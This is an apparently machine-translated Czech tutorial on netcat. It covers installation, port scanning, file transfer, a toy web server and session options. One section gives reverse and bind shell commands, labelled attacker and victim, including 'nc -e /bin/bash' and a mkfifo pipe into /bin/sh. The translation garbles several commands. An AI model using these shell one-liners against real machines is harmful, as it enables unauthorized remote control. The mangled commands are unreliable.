Phenquestions
Krátký rozdíl mezi netcat-traditional a netcat-openbsd
Pro netcat jsou k dispozici dva podobné balíčky s mírným rozdílem mezi nimi.
netcat-tradiční obsahuje další možnost '-e', kterou lze použít pro vytvoření vazby programu (tj.e bash) s netcat. Tato funkce je velmi užitečná pro účely vzdálené správy.
netcat-openbsd mít nějakou další podporu pro IPv6 a proxy.
Instalace Netcat
Ačkoli netcat je předinstalován ve většině distribucí Linuxu, ale pokud není, lze jej snadno nainstalovat pomocí následujících příkazů.
Pro tradiční balíček,
[chráněno e-mailem]: ~ $ sudo apt-get install netcat-traditionalPro verzi openbsd,
[chráněno e-mailem]: ~ $ sudo apt-get install netcat-openbsdNetcat pro Windows lze stáhnout zde https: // sourceforge.síť / projekty / nc110 / soubory /.
Nyní prozkoumáme několik zajímavých případů použití netcat
Skenování portů pomocí netcat
Chcete-li vyhledat otevřené porty, použijte volbu '-z'. Netcat se pokusí připojit ke každému portu bez odesílání dat nebo velmi omezených dat v případě UDP. Zadejte následující
[chráněno e-mailem]: ~ $ nc -z -v hackme.org 80... snip ..
hackme.org [217.78.1.155] 80 (http) otevřeno
Chcete-li vyhledat řadu portů, zadejte
[chráněno e-mailem]: ~ $ nc -z -nv 192.168.100.72 20-80(NEZNÁMÝ) [192.168.100.72] 80 (http) otevřeno
(NEZNÁMÝ) [192.168.100.72] 22 (ssh) otevřeno
Přenos souborů s netcat
Dalším užitečným případem použití netcat je přenos souborů mezi vzdálenými počítači. Z jednoho počítače do druhého můžete odesílat texty a binární soubory. Pokusíme se odeslat soubor „soubor.pdf ”z Linux PC na Windows PC [IP 192.168.100.72] používající jako příklad netcat.
Na počítači se systémem Windows (přijímač) zadejte následující
C: \ Users> nc -nvlp 1337> soubor.pdfPoslech na [0.0.0.0] (rodina 2, port 1337)
Na počítači se systémem Linux (odesílatel) zadejte následující
[chráněno e-mailem]: ~ $ nc -nv 192.168.100.72 1337 < file.pdfPřipojení k 192.168.100.72 Port 1337 [tcp / *] byl úspěšný!
Vzdálená správa pomocí netcat
Jedním z nejlepších případů použití netcat je vzdálená správa, což znamená, že můžete pomocí netcat ovládat počítač někoho jiného. Netcat-traditional je dodáván s volbou '-e', kterou lze použít k vytvoření vazby programu (tj.e cmd.exe ve Windows nebo bash v Linuxu) s portem, což znamená, že netcat bude fungovat jako komunikátor mezi programem a vzdáleným PC. Netcat bude přijímat příkazy ze vzdáleného počítače, spouštět je v místním systému a výsledky bude odesílat zpět do vzdáleného počítače. Tato funkce je široce používána pro škodlivé účely, aby udržovala zadní vrátka v počítačích a serverech. Tato funkce je k dispozici pouze v netcat-traditional, ale s malým trikem lze netcat-openbsd použít také pro stejný účel. Počítač ostatních můžete ovládat dvěma způsoby.
V Reverzní skořápka připojení, útočník naslouchá na portu a čeká na odeslání připojení ze zařízení oběti. Používá se, když je počítač oběti za NAT nebo nemá veřejnou IP.
Chcete-li získat reverzní shell pomocí netcat, musíte naslouchat na portu pomocí netcat. Na počítači útočníka zadejte následující,
[chráněno e-mailem]: ~ $ nc -nvlp 1337Poslech na [0.0.0.0] (rodina 2, port 1337)
Na stroji oběti (pokud netcat-tradiční je nainstalován)
// nahradit „/ bin / bash“ za „cmd.exe “v případě Windows
[chráněno e-mailem]: ~ $ nc -nv [IP_ADDR] 1337 -e / bin / bashPro netcat-openbsd (kde volba „-e“ není podporována)
[chráněno e-mailem]: ~ $ rm / tmp / f; mkfifo / tmp / f; kat/ tmp / f | / bin / sh -i 2> & 1 | nc [IP_ADDR] 1337> / tmp / f
Zatímco v Vázat skořápku připojení, útočník sváže port na počítači oběti a připojí se k tomuto portu pomocí klientské zásuvky. Používá se, když je stroj útočníka za NATem nebo nemá veřejnou IP.
Na počítači oběti napište
[chráněno e-mailem]: ~ $ nc -nlvp 1337 -e / bin / bashposlouchání [libovolného] 1337…
Chcete-li nyní spustit příkazy na počítači oběti, zadejte
[chráněno e-mailem]: ~ $ nc -nv 127.0.0.1 1337Připojení k 127.0.0.1 port 1337 [tcp / *] byl úspěšný!
$ id
uid = 1000 (azad) gid = 1000 (azad) skupiny = 1000 (azad), 4 (adm), 24 (cdrom), 27 (sudo),
30 (dip), 46 (plugdev), 118 (lpadmin), 129 (sambashare)
Jednoduchý webový server využívající netcat
Můžete také udělat další jednoduchý trik a použít netcat jako minimální jednostránkový webový server. Tento webový server by byl velmi jednoduchý bez zvláštních konfigurací a my mu zvykneme posílat náš HTML kód do prohlížeče.
[chráněno e-mailem]: ~ $, zatímco je to pravda; do echo -e "HTTP / 1.1 200 OK \ n \ n $ (ozvěna "
Můj jednoduchý webový server využívající netcat
")" | nc -nvlp 1337; HotovoPoslech na [0.0.0.0] (rodina 2, port 1337)
Nyní zkuste načíst webovou stránku pomocí zvlnění
[chráněno e-mailem]: ~ $ curl http: // 127.0.0.1: 1337 /Můj jednoduchý webový server využívající netcat
Zadejte časový limit relace netcat
Časový limit relace netcat můžete určit pomocí volby „-w“. Netcat automaticky odpojí svou relaci po uplynutí zadaného času.
// -w [čas v sekundách][chráněno e-mailem]: ~ $ nc -w 40 -nvlp 1337
Poslech na [0.0.0.0] (rodina 2, port 1234)
Pokračujte v poslechu, i když klient ukončí připojení
V normálním režimu se server netcat vypne a přestane poslouchat na portu, když klient ukončí připojení. Server můžete udržovat v chodu pomocí volby „-k“
[chráněno e-mailem]: ~ $ nc -k -nlvp 1234Poslech na [0.0.0.0] (rodina 2, port 1234)
Závěr
Netcat je jednoduchý, ale účinný nástroj, který lze použít pro mnoho jednoduchých každodenních úkolů. Dodává se předinstalovaný téměř v každém operačním systému UNIX a lze jej použít pro různé úkoly, jako je komunikace mezi dvěma počítači, přenos souborů a mnoho dalších.
